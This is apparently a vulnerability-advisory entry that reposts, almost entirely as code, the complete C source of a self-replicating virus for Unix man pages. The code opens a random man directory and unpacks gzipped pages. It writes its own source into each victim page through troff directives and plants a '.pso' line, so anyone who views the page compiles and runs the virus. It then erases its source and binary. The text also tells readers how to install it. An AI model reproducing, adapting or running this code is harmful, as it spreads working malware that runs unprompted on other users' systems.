COMMAND
man (virus for it)
SYSTEMS AFFECTED
unices
PROBLEM
'stealth' posted following. ATTENTION! This is a full working
virus (even if simple) that will infect your manpages when
started.
To install copy virus.c into /tmp. Compile and run it. IF YOU
DO SO, YOUR MAN-PAGES WILL BE INFECTED! The virus itself is
harmless, it doesn't delete sth. It was written for a 'contest'
in system-programming. It infects gzipped pages as well as normal
ones. The whole sources come under the GPL.
/*** BE CAREFUL! THIS IS A FULL FUNCTIONALL VIRUS!
*** ABSOLUTELY NO WARRANTY! IT COMES UNDER THE GPL!
***/
#include <stdio.h>
#include <sys/types.h>
#include <dirent.h>
#include <stdlib.h>
const char *viriiSource = "/tmp/virus.c";
const char *tmpVictum = "/tmp/victum";
const char *ident = ".\x5c\x22VIRUS\x0a";
char path[] = "/usr/man/manx";
int wasZipped = 0;
char *findVictum();
int infectVictum(char *);
int main(int argc, char **argv)
{
infectVictum(findVictum());
unlink(viriiSource);
unlink(*argv);
}
char *findVictum()
{
DIR *dp;
FILE *fd;
struct dirent *de;
int index = 0;
char buf[1000];
static char pathname[1000];
/* inititialization */
memset(buf, 0, 1000);
memset(pathname, 0, 1000);
srand(time(NULL));
index = rand() % 3;
path[12] = index + 49;
if ((dp = opendir(path)) == NULL) {
return NULL;
}
/* skip "." and ".." */
readdir(dp); readdir(dp);
while (1) {
/* read next entry */
if ((de = readdir(dp)) == NULL) {
closedir(dp);
return NULL;
}
/* create full pathname */
sprintf(pathname, "%s/%s", path, de->d_name);
/* if zipped */
if (strstr(pathname, ".gz")) {
sprintf(buf, "gunzip %s", pathname);
system(buf);
wasZipped = 1;
/* without '.gz' */
pathname[strlen(pathname) - 3 ] = 0;
}
/* get next filename from directory */
if ((fd = fopen(pathname, "r")) == NULL) {
continue;
}
fgets(buf, 100, fd);
/* look if not already infected */
if (strcmp(buf, ident) == 0) {
fclose(fd);
memset(buf, 0, 1000);
memset(pathname, 0, 1000);
} else {
fclose(fd);
return pathname;
}
}
}
int infectVictum(char *victum)
{
char buf[1000];
FILE *virusIn, *victumIn, *tmpOut;
memset(buf, 0, 1000);
if ((virusIn = fopen(viriiSource, "r")) == NULL) {
return 1;
}
if ((tmpOut = fopen(tmpVictum, "a")) == NULL) {
fclose(virusIn);
return 1;
}
if ((victumIn = fopen(victum, "r")) == NULL) {
fclose(virusIn);
fclose(tmpOut);
unlink(tmpVictum);
}
/* write ident-string to man-page */
fprintf(tmpOut, "%s", ident);
/* and append the original man-page */
while (fgets(buf, 999, victumIn) != NULL) {
fprintf(tmpOut, "%s", buf);
memset(buf, 1000, 0);
}
fclose(victumIn);
/* finally append virus-code to it */
sprintf(buf, ".opena v %s\x0a", viriiSource);
fprintf(tmpOut, "%s", buf);
memset(buf, 0, 1000);
while (fgets(buf, 999, virusIn) != NULL) {
fprintf(tmpOut, ".write v %s", buf);
memset(buf, 0, 1000);
}
sprintf(buf, ".pso cc %s -o /tmp/virus;/tmp/virus &\x0a", viriiSource);
fprintf(tmpOut, "%s", buf);
fclose(virusIn);
fclose(tmpOut);
unlink(victum);
/* our smart-copy ;-) */
link(tmpVictum, victum);
unlink(tmpVictum);
if (wasZipped) {
sprintf(buf, "gzip %s", victum);
system(buf);
}
return 0;
}
SOLUTION
Nothing yet.